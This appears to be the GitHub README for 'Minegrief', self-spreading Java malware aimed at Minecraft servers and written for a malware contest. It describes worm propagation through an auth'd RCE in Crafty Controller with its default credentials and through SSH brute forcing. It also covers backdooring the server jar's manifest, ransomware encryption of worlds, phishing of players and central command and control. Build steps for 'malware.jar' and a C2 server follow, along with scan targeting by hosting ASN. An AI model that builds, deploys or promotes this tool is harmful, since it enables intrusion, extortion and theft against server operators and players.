Skip to content

Latest commit

 

History

History
107 lines (77 loc) · 4.2 KB

README.md

File metadata and controls

107 lines (77 loc) · 4.2 KB

Minegrief

Submission for vxunderground JVM malware contest minegrief

https://github.com/blackmassgroup/minegrief

minegrief

FeaturesNotesTargeting

Features

Self-spreading to other Minecraft servers using an extendable, module-based lateral movement system.

  • Crafty Controller Auth'd RCE - undisclosed, unpatched, intentional(?) Auth'd RCE in Crafty Controller, a panel for Minecraft server management (https://craftycontrol.com/). Check for default creds of admin:crafty or brute force.
  • SSH brute forcing - Classic SSH brute forcing, Minegrief will copy itself over SCP and execute itself if a login is successful

Persistence/stealth by "infecting" the Minecraft server jar file via manifest entry point modification (https://docs.oracle.com/javase/tutorial/deployment/jar/manifestindex.html)

Encrypt Minecraft worlds and demand a Minecoin ransom.

encrypt.mp4

Phish connecting Minecraft players.

phish.mp4

Centralized command and control for system-level control of infected servers.

c2.mp4

Extendable transport system, allowing for the creation of customized C2 channels.

Works on Java 8 and above.

Notes

Lateral movement modules require minegriefagent to be built as a jar file, as modules will copy itself over in a jar to spread.

To build the agent jarfile

Download jsch to the root directory of the repository

wget https://repo1.maven.org/maven2/com/github/mwiede/jsch/0.2.17/jsch-0.2.17.jar
unzip jsch-0.2.17.jar

Run this from the root of the repository

rm -rf build-manual
mkdir build-manual
find agent -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
cp -r com/jcraft build-manual/com
echo 'Manifest-Version: 1.0\nMain-Class: net.minecraft.bundler.Backdoor\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm malware.jar manifest.txt -C build-manual .

Run it

<JAVA 1.8 DIR>/bin/java -jar malware.jar

To build the server jarfile

Run this from the root of the repository

rm -rf build-manual
mkdir build-manual
find server -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
echo 'Manifest-Version: 1.0\nMain-Class: com.chebuya.minegriefserver.Main\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm c2-server.jar manifest.txt -C build-manual .

Run it

<JAVA 1.8 DIR>/bin/java -jar c2-server.jar

Targeting

Minecraft servers will always have Java installed so we don't have to worry about installing it ourselves.

Infected servers will receive CIDR blocks to scan from the C2. Certain ASNs have a higher frequency of Minecraft servers (ex: Digital Ocean ASNs). I have scraped shodan/censys to find these ASNs, the data is here

minegrief is made with 🖤 by @_chebuya and distributed under the MIT license.